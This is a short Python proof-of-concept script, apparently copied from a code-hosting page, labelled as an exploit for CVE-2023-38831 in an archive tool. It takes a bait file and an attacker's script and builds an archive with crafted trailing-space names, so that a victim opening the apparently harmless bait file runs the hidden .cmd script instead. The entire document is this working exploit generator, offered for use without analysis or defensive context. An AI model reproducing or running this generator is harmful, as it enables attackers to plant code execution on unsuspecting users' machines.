46 lines
1.3 KiB
Python
46 lines
1.3 KiB
Python
import shutil
|
|
import os
|
|
|
|
def exploit():
|
|
print("CVE-2023-38831 POC")
|
|
print("-------------------------------")
|
|
|
|
bait_file = input("Enter the bait file name: ")
|
|
script_file = input("Enter the script file name: ")
|
|
output_file = input("Enter the output RAR file name: ")
|
|
|
|
if not os.path.exists(bait_file):
|
|
print(f"Error: {bait_file} does not exist.")
|
|
return
|
|
if not os.path.exists(script_file):
|
|
print(f"Error: {script_file} does not exist.")
|
|
return
|
|
|
|
if not output_file.endswith(".rar"):
|
|
output_file += ".rar"
|
|
|
|
template = "tmp"
|
|
if os.path.exists(template):
|
|
shutil.rmtree(template)
|
|
os.mkdir(template)
|
|
|
|
d = os.path.join(template, bait_file + "A")
|
|
os.mkdir(d)
|
|
shutil.copyfile(script_file, os.path.join(d, bait_file + "A.cmd"))
|
|
shutil.copyfile(bait_file, os.path.join(template, bait_file + "B"))
|
|
|
|
shutil.make_archive(template, 'zip', template)
|
|
with open(template + ".zip", "rb") as f:
|
|
content = f.read()
|
|
content = content.replace(b"A", b" ")
|
|
content = content.replace(b"B", b" ")
|
|
os.remove(template + ".zip")
|
|
|
|
with open(output_file, "wb") as f:
|
|
f.write(content)
|
|
|
|
print(f"Exploit generated successfully as '{output_file}'.")
|
|
|
|
if __name__ == "__main__":
|
|
exploit()
|